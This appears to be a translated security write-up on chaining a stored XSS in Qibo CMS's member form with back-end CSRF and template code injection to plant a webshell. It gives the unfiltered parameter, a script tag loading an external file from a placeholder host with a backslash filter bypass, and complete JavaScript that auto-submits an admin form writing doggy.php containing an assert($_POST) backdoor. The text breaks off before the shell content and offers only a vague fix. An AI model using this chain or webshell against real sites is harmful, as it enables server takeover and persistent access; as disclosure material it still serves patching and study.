Qibo CMS stored XSS getshell (combined use)

Source: Internet
Author: User

Qibo CMS: a getshell obtained by combining a front-end stored XSS with back-end CSRF and three back-end 0day getshells. The threat is small and the impact negligible, so this is not a serious vulnerability, but the problems and breakthroughs met along the way are gratifying. Please refer to the official website. -- by pandas

Some time ago, when Xidu published a qibocms 0day, I looked at the Qibo CMS code and found several getshells in the back end. There were a lot of them, and the vendor's position was that they have little impact and can be ignored. Basically every form submitted in the back end is vulnerable to CSRF. A front-end entry point would raise the impact a lot, so I black-boxed the front end and dug out an XSS; chained together, this gives a getshell.

1. Stored XSS location: Member Center -> Omnipotent Form -> Publish Information -> Moderator Application. The submitted value of postdb[sortname][] is not filtered. Its length is limited, but it is enough to write <script src="http://xxx.com/1.js">. After submission, the administrator has to open the back end and choose Shortcut -> Omnipotent Form Model Management -> Moderator Application -> Management -> View Details. The forward slash is replaced, so a backslash is used instead: <script src="http:\xxx.com\1.js">. 1.js is the file we load externally; its content is given below.

2. The script has to submit a form in the back end, located at System Function -> Plug-in Management -> Points Introduction Management (jfadmin_mod). Editing any points introduction and inserting ${@phpinfo();} in the title or content causes code execution, so the submitted value can instead write a PHP file. The content of 1.js is as follows:

    // 1.js: loaded by the stored XSS; builds a hidden form and auto-submits it
    // to the back-end points-introduction handler (the CSRF step described above).
    thisTHost = top.location.hostname;
    thisTHost = "http://" + thisTHost + "/v7/admin/index.php?lfj=jfadmin&action=addjf";

    function PostSubmit(url) {
        var postUrl = url;
        var ExportForm = document.createElement("FORM");
        document.body.appendChild(ExportForm);
        ExportForm.method = "POST";
        var newElement = document.createElement("input");
        newElement.setAttribute("name", "title");
        var newElement2 = document.createElement("input");
        newElement2.setAttribute("name", "fid");
        var newElement3 = document.createElement("input");
        newElement3.setAttribute("name", "list");
        var newElement4 = document.createElement("input");
        newElement4.setAttribute("name", "content");
        ExportForm.appendChild(newElement);
        ExportForm.appendChild(newElement2);
        ExportForm.appendChild(newElement3);
        ExportForm.appendChild(newElement4);
        // the title field is where the back end evaluates the ${...} expression
        newElement.value = "${@fwrite(fopen('doggy.php', 'w+'), '<?php assert($_POST[aaa]);?>')}";
        newElement2.value = 1;
        newElement3.value = 1;
        newElement4.value = 1;
        ExportForm.action = postUrl;
        ExportForm.submit();
    }
    PostSubmit(thisTHost);

There are two parts to the proof:

1. User part: 1) log in; 2) write the XSS.

2. Administrator part: after the administrator views the application, doggy.php is added under the website's admin directory, with the content:
Solution: repair with emphasis.
